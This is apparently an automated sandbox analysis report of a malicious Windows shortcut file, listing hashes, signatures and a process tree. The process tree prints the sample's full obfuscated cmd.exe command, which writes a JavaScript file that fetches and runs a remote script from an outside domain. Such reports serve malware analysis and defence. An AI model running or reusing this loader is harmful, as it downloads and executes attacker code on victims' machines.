Overview

overview

3

Static

static

1

461870cfb6...da.lnk

windows7-x64

3

461870cfb6...da.lnk

windows10-2004-x64

1

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    10-01-2024 18:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    461870cfb645f0890a4a1ec5480a4c088969726da96e30c95ac210ae868109da.lnk

  • Size

    1014B

  • MD5

    00d16a44fffdd1ea7e9d107256a38e16

  • SHA1

    bbbdccf32c0581735e35f0aeb21e26e804328a7c

  • SHA256

    461870cfb645f0890a4a1ec5480a4c088969726da96e30c95ac210ae868109da

  • SHA512

    ec4ef82c5185d86c1edac28498094cd2365378914b14429777688f8df9e603f5a81a7aa98018dd86513ce1beb2a5907fc82bf115478bf7044592902d32c59534

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "S^eT BKL=C:\9c0SP3\&& mD !BKL!>nul 2>&1&&S^eT MLHA=!BKL!^BTGXVMAC.JS&&<nul set/p ZENZ=var ZENZ='\u0031\u0059\u0050\u002b\u0044\u0031\u0059\u0050\u002b\u0045\u0031\u0059\u0050\u002b\u0022\u002f\u002f\u0077\u0033\u0069\u0075\u0077\u006c\u002e\u006e\u0065\u0078\u0074\u006d\u0061\u0078\u002e\u006d\u0079\u002e\u0069\u0064\u002f\u003f\u0031\u002f\u0022\u0029\u003b';BKL='\u003a\u0068\u0022\u003b\u0045\u0031\u0059\u0050\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';BTGX='\u0076\u0061\u0072\u0020\u0043\u0031\u0059\u0050\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0031\u0059\u0050\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';MLHA=BTGX+BKL+ZENZ;VMAC=new Function(MLHA);VMAC(); >!MLHA!|caLl !MLHA!||caLl !MLHA! "
    1⤵
      PID:2728
    • C:\Windows\system32\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\461870cfb645f0890a4a1ec5480a4c088969726da96e30c95ac210ae868109da.lnk
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:2236

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads